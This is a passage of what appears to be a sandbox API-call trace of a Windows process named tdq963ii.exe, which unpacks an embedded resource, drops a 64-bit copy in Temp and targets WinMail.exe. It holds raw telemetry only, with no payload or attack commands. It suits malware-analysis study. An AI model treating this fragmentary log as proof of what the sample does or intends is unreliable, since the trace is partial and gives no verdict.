lpName="RCHANDLE64", lpType="BINRES") returned 0x476060 [0243.174] LoadResource (hModule=0x0, hResInfo=0x476060) returned 0x43c648 [0243.174] SizeofResource (hModule=0x0, hResInfo=0x476060) returned 0x37490 [0243.174] LockResource (hResData=0x43c648) returned 0x43c648 [0243.174] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x18) returned 0x5c9e88 [0243.174] CreateFileW (lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\tdq963ii64.exe" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\tdq963ii64.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x18f95c, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0243.175] GetLastError () returned 0x20 [0243.175] GetLastError () returned 0x20 [0243.175] SetLastError (dwErrCode=0x20) [0243.175] GetLastError () returned 0x20 [0243.175] SetLastError (dwErrCode=0x20) [0243.175] GetLastError () returned 0x20 [0243.175] SetLastError (dwErrCode=0x20) [0243.175] GetLastError () returned 0x20 [0243.175] SetLastError (dwErrCode=0x20) [0243.176] GetLastError () returned 0x20 [0243.176] SetLastError (dwErrCode=0x20) [0243.176] GetLastError () returned 0x20 [0243.176] SetLastError (dwErrCode=0x20) [0243.176] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x1000) returned 0x5c9ea8 [0243.177] WriteFile (in: hFile=0x80, lpBuffer=0x18ea08*, nNumberOfBytesToWrite=0x49, lpNumberOfBytesWritten=0x18e334, lpOverlapped=0x0 | out: lpBuffer=0x18ea08*, lpNumberOfBytesWritten=0x18e334*=0x49, lpOverlapped=0x0) returned 1 [0243.179] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c93d0 | out: hHeap=0x5b0000) returned 1 [0243.179] GetModuleHandleExW (in: dwFlags=0x0, lpModuleName="mscoree.dll", phModule=0x18fedc | out: phModule=0x18fedc) returned 0 [0243.179] ExitProcess (uExitCode=0x1) [0243.179] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c60c0 | out: hHeap=0x5b0000) returned 1 Process: id = "267" image_name = "tdq963ii.exe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tdq963ii.exe" page_root = "0x15031000" os_pid = "0x570" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "265" os_parent_pid = "0xaec" cmd_line = "tdq963ii.exe -accepteula \"WinMail.exe\" -nobanner" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 883 os_tid = 0x648 [0243.616] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76d30000 [0243.617] GetProcAddress (hModule=0x76d30000, lpProcName="SetEvent") returned 0x76d416c5 [0243.617] GetProcAddress (hModule=0x76d30000, lpProcName="WaitForSingleObject") returned 0x76d41136 [0243.617] GetProcAddress (hModule=0x76d30000, lpProcName="DeviceIoControl") returned 0x76d4322f [0243.617] GetProcAddress (hModule=0x76d30000, lpProcName="DuplicateHandle") returned 0x76d41886 [0243.617] GetProcAddress (hModule=0x76d30000, lpProcName="FormatMessageW") returned 0x76d44620 [0243.617] GetProcAddress (hModule=0x76d30000, lpProcName="CreateEventW") returned 0x76d4183e [0243.617] GetProcAddress (hModule=0x76d30000, lpProcName="CreateProcessW") returned 0x76d4103d [0243.617] GetProcAddress (hModule=0x76d30000, lpProcName="ExpandEnvironmentStringsW") returned 0x76d44173 [0243.618] GetProcAddress (hModule=0x76d30000, lpProcName="GetDriveTypeW") returned 0x76d4418b [0243.618] GetProcAddress (hModule=0x76d30000, lpProcName="GetSystemDirectoryW") returned 0x76d45063 [0243.618] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteFileW") returned 0x76d489b3 [0243.618] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadErrorMode") returned 0x76dbaf42 [0243.618] GetProcAddress (hModule=0x76d30000, lpProcName="HeapSize") returned 0x77c73002 [0243.618] GetProcAddress (hModule=0x76d30000, lpProcName="LCMapStringW") returned 0x76d417b9 [0243.618] GetProcAddress (hModule=0x76d30000, lpProcName="GetStringTypeW") returned 0x76d41946 [0243.619] GetProcAddress (hModule=0x76d30000, lpProcName="TerminateThread") returned 0x76d47a2f [0243.619] GetProcAddress (hModule=0x76d30000, lpProcName="OpenProcess") returned 0x76d41986 [0243.619] GetProcAddress (hModule=0x76d30000, lpProcName="GetVersion") returned 0x76d44467 [0243.619] GetProcAddress (hModule=0x76d30000, lpProcName="CreateFileW") returned 0x76d43f5c [0243.619] GetProcAddress (hModule=0x76d30000, lpProcName="FindResourceW") returned 0x76d45971 [0243.619] GetProcAddress (hModule=0x76d30000, lpProcName="SizeofResource") returned 0x76d45ac9 [0243.619] GetProcAddress (hModule=0x76d30000, lpProcName="CloseHandle") returned 0x76d41410 [0243.620] GetProcAddress (hModule=0x76d30000, lpProcName="SetLastError") returned 0x76d411a9 [0243.620] GetProcAddress (hModule=0x76d30000, lpProcName="LoadResource") returned 0x76d4594c [0243.620] GetProcAddress (hModule=0x76d30000, lpProcName="GetLastError") returned 0x76d411c0 [0243.620] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcess") returned 0x76d41809 [0243.620] GetProcAddress (hModule=0x76d30000, lpProcName="LockResource") returned 0x76d45959 [0243.620] GetProcAddress (hModule=0x76d30000, lpProcName="GetCommandLineW") returned 0x76d45223 [0243.620] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleW") returned 0x76d434b0 [0243.620] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryW") returned 0x76d4492b [0243.621] GetProcAddress (hModule=0x76d30000, lpProcName="GetStdHandle") returned 0x76d451b3 [0243.621] GetProcAddress (hModule=0x76d30000, lpProcName="LocalFree") returned 0x76d42d3c [0243.621] GetProcAddress (hModule=0x76d30000, lpProcName="LocalAlloc") returned 0x76d4168c [0243.621] GetProcAddress (hModule=0x76d30000, lpProcName="GetProcAddress") returned 0x76d41222 [0243.621] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleFileNameW") returned 0x76d44950 [0243.621] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleScreenBufferInfo") returned 0x76d6bafd [0243.621] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileType") returned 0x76d43531 [0243.621] GetProcAddress (hModule=0x76d30000, lpProcName="OutputDebugStringW") returned 0x76d6d1d4 [0243.621] GetProcAddress (hModule=0x76d30000, lpProcName="ReadConsoleW") returned 0x76de739a [0243.622] GetProcAddress (hModule=0x76d30000, lpProcName="WriteConsoleW") returned 0x76d67aca [0243.622] GetProcAddress (hModule=0x76d30000, lpProcName="SetFilePointerEx") returned 0x76d5c807 [0243.622] GetProcAddress (hModule=0x76d30000, lpProcName="EnterCriticalSection") returned 0x77c622b0 [0243.622] GetProcAddress (hModule=0x76d30000, lpProcName="LeaveCriticalSection") returned 0x77c62270 [0243.622] GetProcAddress (hModule=0x76d30000, lpProcName="SetStdHandle") returned 0x76dc454f [0243.622] GetProcAddress (hModule=0x76d30000, lpProcName="HeapAlloc") returned 0x77c6e026 [0243.622] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0243.622] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0243.622] GetProcAddress (hModule=0x76d30000, lpProcName="ExitProcess") returned 0x76d47a10 [0243.623] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleExW") returned 0x76d44a6f [0243.623] GetProcAddress (hModule=0x76d30000, lpProcName="MultiByteToWideChar") returned 0x76d4192e [0243.623] GetProcAddress (hModule=0x76d30000, lpProcName="WideCharToMultiByte") returned 0x76d4170d [0243.826] GetProcAddress (hModule=0x76d30000, lpProcName="HeapFree") returned 0x76d414c9 [0243.827] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleMode") returned 0x76d41328 [0243.827] GetProcAddress (hModule=0x76d30000, lpProcName="ReadConsoleInputA") returned 0x76de6f53 [0243.827] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleMode") returned 0x76d5a77d [0243.827] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThread") returned 0x76d434d5 [0243.827] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentThreadId") returned 0x76d41450 [0243.827] GetProcAddress (hModule=0x76d30000, lpProcName="ExitThread") returned 0x77c9d598 [0243.827] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryExW") returned 0x76d4495d [0243.827] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteCriticalSection") returned 0x77c745f5 [0243.827] GetProcAddress (hModule=0x76d30000, lpProcName="FlushFileBuffers") returned 0x76d4469b [0243.828] GetProcAddress (hModule=0x76d30000, lpProcName="WriteFile") returned 0x76d41282 [0243.828] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleCP") returned 0x76de7bff [0243.828] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0243.828] GetProcAddress (hModule=0x76d30000, lpProcName="IsProcessorFeaturePresent") returned 0x76d45235 [0243.828] GetProcAddress (hModule=0x76d30000, lpProcName="ReadFile") returned 0x76d43ed3 [0243.828] GetProcAddress (hModule=0x76d30000, lpProcName="GetStartupInfoW") returned 0x76d44d40 [0243.828] GetProcAddress (hModule=0x76d30000, lpProcName="UnhandledExceptionFilter") returned 0x76d6772f [0243.828] GetProcAddress (hModule=0x76d30000, lpProcName="SetUnhandledExceptionFilter") returned 0x76d487c9 [0243.828] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeCriticalSectionAndSpinCount") returned 0x76d41916 [0243.829] GetProcAddress (hModule=0x76d30000, lpProcName="Sleep") returned 0x76d410ff [0243.829] GetProcAddress (hModule=0x76d30000, lpProcName="TerminateProcess") returned 0x76d5d802 [0243.829] GetProcAddress (hModule=0x76d30000, lpProcName="TlsAlloc") returned 0x76d449ad [0243.829] GetProcAddress (hModule=0x76d30000, lpProcName="TlsGetValue") returned 0x76d411e0 [0243.829] GetProcAddress (hModule=0x76d30000, lpProcName="TlsSetValue") returned 0x76d414fb [0243.829] GetProcAddress (hModule=0x76d30000, lpProcName="TlsFree") returned 0x76d43587 [0243.829] GetProcAddress (hModule=0x76d30000, lpProcName="IsValidCodePage") returned 0x76d44493 [0243.829] GetProcAddress (hModule=0x76d30000, lpProcName="GetACP") returned 0x76d4179c [0243.830] GetProcAddress (hModule=0x76d30000, lpProcName="GetOEMCP") returned 0x76d6d1a1 [0243.830] GetProcAddress (hModule=0x76d30000, lpProcName="GetCPInfo") returned 0x76d45189 [0243.830] GetProcAddress (hModule=0x76d30000, lpProcName="GetProcessHeap") returned 0x76d414e9 [0243.830] GetProcAddress (hModule=0x76d30000, lpProcName="RtlUnwind") returned 0x76d6d1c3 [0243.830] GetProcAddress (hModule=0x76d30000, lpProcName="QueryPerformanceCounter") returned 0x76d41725 [0243.830] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcessId") returned 0x76d411f8 [0243.830] GetProcAddress (hModule=0x76d30000, lpProcName="GetSystemTimeAsFileTime") returned 0x76d43509 [0243.830] GetProcAddress (hModule=0x76d30000, lpProcName="GetEnvironmentStringsW") returned 0x76d451e3 [0243.830] GetProcAddress (hModule=0x76d30000, lpProcName="FreeEnvironmentStringsW") returned 0x76d451cb [0243.831] GetProcAddress (hModule=0x76d30000, lpProcName="HeapReAlloc") returned 0x77c81f6e [0243.831] GetProcAddress (hModule=0x76d30000, lpProcName="SetEndOfFile") returned 0x76d5ce2e [0243.831] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x77710000 [0243.831] GetProcAddress (hModule=0x77710000, lpProcName="GetTokenInformation") returned 0x7772431c [0243.831] GetProcAddress (hModule=0x77710000, lpProcName="RegDeleteKeyW") returned 0x77721272 [0243.831] GetProcAddress (hModule=0x77710000, lpProcName="LookupPrivilegeValueW") returned 0x777241b3 [0243.831] GetProcAddress (hModule=0x77710000, lpProcName="AdjustTokenPrivileges") returned 0x7772418e [0243.831] GetProcAddress (hModule=0x77710000, lpProcName="OpenProcessToken") returned 0x77724304 [0243.832] GetProcAddress (hModule=0x77710000, lpProcName="RegSetValueExW") returned 0x777214d6 [0243.832] GetProcAddress (hModule=0x77710000, lpProcName="RegQueryValueExW") returned 0x777246ad [0243.832] GetProcAddress (hModule=0x77710000, lpProcName="RegOpenKeyExW") returned 0x7772468d [0243.832] GetProcAddress (hModule=0x77710000, lpProcName="RegOpenKeyW") returned 0x77722459 [0243.832] GetProcAddress (hModule=0x77710000, lpProcName="RegCreateKeyW") returned 0x77721514 [0243.832] GetProcAddress (hModule=0x77710000, lpProcName="RegCloseKey") returned 0x7772469d [0243.832] GetProcAddress (hModule=0x77710000, lpProcName="LookupAccountSidW") returned 0x77724874 [0243.832] LoadLibraryA (lpLibFileName="COMDLG32.dll") returned 0x77270000 [0243.833] GetProcAddress (hModule=0x77270000, lpProcName="PrintDlgW") returned 0x772733a3 [0243.833] LoadLibraryA (lpLibFileName="GDI32.dll") returned 0x770a0000 [0243.833] GetProcAddress (hModule=0x770a0000, lpProcName="StartPage") returned 0x770e401a [0243.833] GetProcAddress (hModule=0x770a0000, lpProcName="EndDoc") returned 0x770e3f29 [0243.833] GetProcAddress (hModule=0x770a0000, lpProcName="StartDocW") returned 0x770e4c51 [0243.833] GetProcAddress (hModule=0x770a0000, lpProcName="SetMapMode") returned 0x770bb02f [0243.833] GetProcAddress (hModule=0x770a0000, lpProcName="GetDeviceCaps") returned 0x770b4de0 [0243.834] GetProcAddress (hModule=0x770a0000, lpProcName="EndPage") returned 0x770c6bde [0243.834] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x77130000 [0243.834] GetProcAddress (hModule=0x77130000, lpProcName="SendMessageW") returned 0x77149679 [0243.834] GetProcAddress (hModule=0x77130000, lpProcName="DialogBoxIndirectParamW") returned 0x7716cbf3 [0243.834] GetProcAddress (hModule=0x77130000, lpProcName="EndDialog") returned 0x7716b99c [0243.834] GetProcAddress (hModule=0x77130000, lpProcName="LoadCursorW") returned 0x771488f7 [0243.834] GetProcAddress (hModule=0x77130000, lpProcName="InflateRect") returned 0x77153309 [0243.835] GetProcAddress (hModule=0x77130000, lpProcName="GetSysColorBrush") returned 0x771535a4 [0243.835] GetProcAddress (hModule=0x77130000, lpProcName="SetCursor") returned 0x771541f6 [0243.835] GetProcAddress (hModule=0x77130000, lpProcName="SetWindowTextW") returned 0x771520ec [0243.835] GetProcAddress (hModule=0x77130000, lpProcName="GetDlgItem") returned 0x7716f1ba [0243.835] LoadLibraryA (lpLibFileName="VERSION.dll") returned 0x75440000 [0243.835] GetProcAddress (hModule=0x75440000, lpProcName="GetFileVersionInfoW") returned 0x754419f4 [0243.835] GetProcAddress (hModule=0x75440000, lpProcName="VerQueryValueW") returned 0x75441b51 [0243.835] GetProcAddress (hModule=0x75440000, lpProcName="GetFileVersionInfoSizeW") returned 0x754419d9 [0243.835] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x4, lpflOldProtect=0x18ff68 | out: lpflOldProtect=0x18ff68*=0x2) returned 1 [0243.837] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x2, lpflOldProtect=0x18ff68 | out: lpflOldProtect=0x18ff68*=0x4) returned 1 [0243.837] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18ff78 | out: lpSystemTimeAsFileTime=0x18ff78*(dwLowDateTime=0x471c57e0, dwHighDateTime=0x1d68287)) [0243.837] GetCurrentThreadId () returned 0x648 [0243.837] GetCurrentProcessId () returned 0x570 [0243.837] QueryPerformanceCounter (in: lpPerformanceCount=0x18ff70 | out: lpPerformanceCount=0x18ff70*=36417592271) returned 1 [0243.837] GetProcessHeap () returned 0x250000 [0243.837] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76d30000 [0243.838] GetProcAddress (hModule=0x76d30000, lpProcName="FlsAlloc") returned 0x76d44f2b [0243.838] GetProcAddress (hModule=0x76d30000, lpProcName="FlsFree") returned 0x76d4359f [0243.838] GetProcAddress (hModule=0x76d30000, lpProcName="FlsGetValue") returned 0x76d41252 [0243.838] GetProcAddress (hModule=0x76d30000, lpProcName="FlsSetValue") returned 0x76d44208 [0243.838] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeCriticalSectionEx") returned 0x76d44d28 [0243.838] GetProcAddress (hModule=0x76d30000, lpProcName="CreateEventExW") returned 0x76dc410b [0243.838] GetProcAddress (hModule=0x76d30000, lpProcName="CreateSemaphoreExW") returned 0x76dc4195 [0243.839] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadStackGuarantee") returned 0x76d4d31f [0243.839] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThreadpoolTimer") returned 0x76d5ee7e [0243.839] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadpoolTimer") returned 0x77c8441c [0243.839] GetProcAddress (hModule=0x76d30000, lpProcName="WaitForThreadpoolTimerCallbacks") returned 0x77cac50e [0243.839] GetProcAddress (hModule=0x76d30000, lpProcName="CloseThreadpoolTimer") returned 0x77cac381 [0243.839] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThreadpoolWait") returned 0x76d5f088 [0243.839] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadpoolWait") returned 0x77c905d7 [0243.840] GetProcAddress (hModule=0x76d30000, lpProcName="CloseThreadpoolWait") returned 0x77caca24 [0243.840] GetProcAddress (hModule=0x76d30000, lpProcName="FlushProcessWriteBuffers") returned 0x77c60b8c [0243.840] GetProcAddress (hModule=0x76d30000, lpProcName="FreeLibraryWhenCallbackReturns") returned 0x77d1fde8 [0243.840] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcessorNumber") returned 0x77cb1e1d [0243.840] GetProcAddress (hModule=0x76d30000, lpProcName="GetLogicalProcessorInformation") returned 0x76dc4761 [0243.840] GetProcAddress (hModule=0x76d30000, lpProcName="CreateSymbolicLinkW") returned 0x76dbcd11 [0243.840] GetProcAddress (hModule=0x76d30000, lpProcName="SetDefaultDllDirectories") returned 0x0 [0243.840] GetProcAddress (hModule=0x76d30000, lpProcName="EnumSystemLocalesEx") returned 0x76dc424f [0243.841] GetProcAddress (hModule=0x76d30000, lpProcName="CompareStringEx") returned 0x76dc46b1 [0243.841] GetProcAddress (hModule=0x76d30000, lpProcName="GetDateFormatEx") returned 0x76dd6676 [0243.841] GetProcAddress (hModule=0x76d30000, lpProcName="GetLocaleInfoEx") returned 0x76dc4751 [0243.841] GetProcAddress (hModule=0x76d30000, lpProcName="GetTimeFormatEx") returned 0x76dd65f1 [0243.841] GetProcAddress (hModule=0x76d30000, lpProcName="GetUserDefaultLocaleName") returned 0x76dc47c1 [0243.841] GetProcAddress (hModule=0x76d30000, lpProcName="IsValidLocaleName") returned 0x76dc47e1 [0243.841] GetProcAddress (hModule=0x76d30000, lpProcName="LCMapStringEx") returned 0x76dc47f1 [0243.841] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentPackageId") returned 0x0 [0243.841] GetProcAddress (hModule=0x76d30000, lpProcName="GetTickCount64") returned 0x76d5eee0 [0243.842] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileInformationByHandleExW") returned 0x0 [0243.842] GetProcAddress (hModule=0x76d30000, lpProcName="SetFileInformationByHandleW") returned 0x0 [0243.843] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x3bc) returned 0x2660b0 [0243.843] GetCurrentThreadId () returned 0x648 [0243.843] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x18) returned 0x266478 [0243.843] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x800) returned 0x266498 [0243.843] GetStartupInfoW (in: lpStartupInfo=0x18fed8 | out: lpStartupInfo=0x18fed8*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="tdq963ii.exe -accepteula \"WinMail.exe\" -nobanner", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x40ad42, hStdOutput=0x3c628d24, hStdError=0x0)) [0243.843] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3 [0243.843] GetFileType (hFile=0x3) returned 0x2 [0243.844] GetStdHandle (nStdHandle=0xfffffff5) returned 0x80 [0243.844] GetFileType (hFile=0x80) returned 0x3 [0243.844] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0243.844] GetFileType (hFile=0xb) returned 0x2 [0243.844] GetCommandLineW () returned="tdq963ii.exe -accepteula \"WinMail.exe\" -nobanner" [0243.844] GetEnvironmentStringsW () returned 0x266ca0* [0243.845] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0xb7e) returned 0x267828 [0243.845] FreeEnvironmentStringsW (penv=0x266ca0) returned 1 [0243.845] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x426ea0, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tdq963ii.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tdq963ii.exe")) returned 0x32 [0243.845] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x72) returned 0x25f8d0 [0243.845] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0xa0) returned 0x266ca0 [0243.845] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x3e) returned 0x2683c8 [0243.846] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x6c) returned 0x266d48 [0243.846] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x6e) returned 0x266dc0 [0243.846] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x78) returned 0x25f950 [0243.846] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x62) returned 0x266e38 [0243.846] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x2e) returned 0x266ea8 [0243.846] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x48) returned 0x266ee0 [0243.846] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x22) returned 0x266f30 [0243.846] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x28) returned 0x266f60 [0243.846] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x1a) returned 0x265a80 [0243.846] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x4a) returned 0x266f90 [0243.846] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x72) returned 0x25f9d0 [0243.846] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x30) returned 0x266fe8 [0243.846] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x2e) returned 0x267020 [0243.846] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x1c) returned 0x265aa8 [0243.846] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0xd2) returned 0x267058 [0243.846] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x7c) returned 0x267138 [0243.846] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x36) returned 0x2671c0 [0243.846] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x3a) returned 0x268410 [0243.846] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x90) returned 0x267200 [0243.846] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x24) returned 0x267298 [0243.846] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x30) returned 0x2672c8 [0243.846] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x36) returned 0x267300 [0243.846] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x48) returned 0x267340 [0243.846] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x52) returned 0x267390 [0243.846] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x3c) returned 0x268458 [0243.846] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x18) returned 0x2673f0 [0243.846] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x82) returned 0x267410 [0243.847] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x2e) returned 0x2674a0 [0243.847] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x1e) returned 0x265ad0 [0243.847] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x2c) returned 0x2674d8 [0243.847] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x54) returned 0x267510 [0243.847] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x52) returned 0x267570 [0243.847] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x2a) returned 0x2675d0 [0243.847] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x3c) returned 0x2684a0 [0243.847] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x54) returned 0x267608 [0243.847] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x24) returned 0x267668 [0243.847] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x30) returned 0x267698 [0243.847] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x8c) returned 0x2676d0 [0243.847] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x267828 | out: hHeap=0x250000) returned 1 [0243.848] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x800) returned 0x2693b0 [0243.848] GetLastError () returned 0x0 [0243.848] SetLastError (dwErrCode=0x0) [0243.848] GetLastError () returned 0x0 [0243.848] SetLastError (dwErrCode=0x0) [0243.848] GetLastError () returned 0x0 [0243.848] SetLastError (dwErrCode=0x0) [0243.848] GetACP () returned 0x4e4 [0243.848] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x220) returned 0x269bb8 [0243.848] GetLastError () returned 0x0 [0243.848] SetLastError (dwErrCode=0x0) [0243.848] IsValidCodePage (CodePage=0x4e4) returned 1 [0243.848] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18fecc | out: lpCPInfo=0x18fecc) returned 1 [0243.848] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f994 | out: lpCPInfo=0x18f994) returned 1 [0243.848] GetLastError () returned 0x0 [0243.848] SetLastError (dwErrCode=0x0) [0243.848] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0243.848] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x18f718, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0243.848] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x18f9a8 | out: lpCharType=0x18f9a8) returned 1 [0243.848] GetLastError () returned 0x0 [0243.848] SetLastError 